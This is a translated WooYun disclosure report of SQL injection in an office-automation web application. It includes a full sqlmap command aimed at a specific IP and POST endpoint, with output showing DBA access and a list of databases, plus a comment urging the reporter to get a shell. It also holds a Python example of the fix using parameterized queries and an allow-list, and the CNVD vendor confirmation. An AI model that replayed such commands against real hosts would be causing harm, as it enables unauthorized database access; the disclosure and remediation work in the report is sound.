sqlmap.py -u "http://112.124.41.23:38888/DocFile/DangAn.aspx" --data "__VIEWSTATE=%2FwEPDwULLTExMDg2MDE4MzgPZBYCZg9kFggCAQ8PFgIeBFRleHRlZGQCDg88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGA8PFgIfAAUBMWRkAhoPDxYCHwAFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RZGyacswZw0WUqdtMoHBbw71m9hg%3D%3D&TextBox1=abc&ImageButton4.x=23&ImageButton4.y=10&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLNrKeTAQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbOjWL4mdYarCP4ShF8FGyvhczRv" -p TextBox1 --dbms="mssql" --current-db --current-user --is-dba --dbs


Databases:

current user:    'sa'
[17:38:23] [INFO] fetching current database
current database: 'FGOA'
[17:38:23] [INFO] testing if current user is DBA
current user is DBA: True
[17:38:24] [INFO] fetching database names
available databases [11]:
[*] FG360
[*] FGOA
[*] FGOA_T1
[*] JWOA
[*] JYOA
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb


Tables:

Database: FGOA
[121 tables]


Proof of vulnerability:

Already demonstrated above

Fix:

Filter input + upgrade the program, then patch
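
An added example (not from the original report or the vendor's code) of a code-level fix for the search forms listed above: the keyword field (TextBox1) is bound as a query parameter and the dropdown value (DropDownList1) is checked against an allow-list. It assumes the flawed pages concatenate both fields into the SQL text, and uses Python with an in-memory SQLite table and constructed rows in place of the application's ASP.NET/MSSQL stack.

```python
import sqlite3

# Constructed sample rows; the table is a stand-in, not the vendor's schema.
ROWS = [
    (1, "Acme", "printer paper"),
    (2, "Globex", "network switch"),
    (3, "Initech", "red stapler"),
]

# Allow-list for the dropdown value (the report shows DropDownList1 carrying
# column names such as NeedContent and CustomName).
SEARCHABLE = {"CustomName", "NeedContent"}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE CustomNeed ("
        "ID INTEGER PRIMARY KEY, CustomName TEXT, NeedContent TEXT)"
    )
    conn.executemany("INSERT INTO CustomNeed VALUES (?, ?, ?)", ROWS)
    return conn


def search_vulnerable(conn, column, keyword):
    # Assumed shape of the flaw: both form fields are pasted into the SQL text,
    # so a quote in the keyword ends the string literal and becomes SQL.
    sql = f"SELECT ID FROM CustomNeed WHERE {column} LIKE '%{keyword}%'"
    return sorted(row[0] for row in conn.execute(sql))


def escape_like(text):
    # Make LIKE wildcards literal. SQL Server also treats '[' as a wildcard,
    # so escape it as well when porting this to T-SQL.
    for ch in ("\\", "%", "_"):
        text = text.replace(ch, "\\" + ch)
    return text


def search_hardened(conn, column, keyword):
    # Identifiers cannot be bound as parameters, so the column must come from
    # a fixed allow-list; the keyword is only ever passed as a bound value.
    if column not in SEARCHABLE:
        raise ValueError("unknown search column")
    if len(keyword) > 100:
        raise ValueError("keyword too long")
    sql = f"SELECT ID FROM CustomNeed WHERE {column} LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(keyword) + "%"
    return sorted(row[0] for row in conn.execute(sql, (pattern,)))


if __name__ == "__main__":
    db = make_db()
    crafted = "zzz' OR 1=1 --"  # classic tautology, used only to show the difference
    print("vulnerable:", search_vulnerable(db, "NeedContent", crafted))
    print("hardened:  ", search_hardened(db, "NeedContent", crafted))
```

Parameter binding closes the injection itself; the `sa` login and `current user is DBA: True` in the output above are a separate least-privilege problem, and the application should connect with an account limited to its own database.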

Copyright notice: please credit the source when reposting, goubuli@乌云 (WooYun)


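Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-06-23 08:45

Vendor reply:

CNVD confirmed and reproduced the situation described. CNVD has notified the software vendor through public contact channels, and the vendor will subsequently coordinate with the website operators to handle it.

Latest status:

None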


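Vulnerability comments:

Comments

  1. 2015-06-18 10:46 | change ( Intern white hat | Rank: 60, Bugs: 15 | Core white hat)

    Dug clean////

  2. 2015-06-18 10:50 | goubuli ( Regular white hat | Rank: 324, Bugs: 61 )

    @change Get a shell and go in to look around slowly, there will probably be more ( ̄▽ ̄)

  3. 2015-06-18 10:53 | %230CC ( Passer-by | Rank: 6, Bugs: 2 | 溜溜)

    What is "a certain OA"?

  4. 2015-09-21 08:55 | 心云 ( Passer-by | Rank: 6, Bugs: 4 | Learn the craft well, read good books, be a good person.)

    I would like to ask how you found so many POST injections....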